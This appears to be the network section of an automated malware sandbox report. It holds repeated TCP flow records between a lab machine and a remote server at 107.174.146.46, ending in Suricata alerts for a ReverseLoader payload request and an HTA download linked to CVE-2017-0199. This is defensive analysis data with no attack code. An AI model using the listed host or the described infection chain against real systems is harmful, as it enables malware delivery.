Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49165

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 107.174.146.46:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.174.146.46:80 -> 192.168.2.22:49162
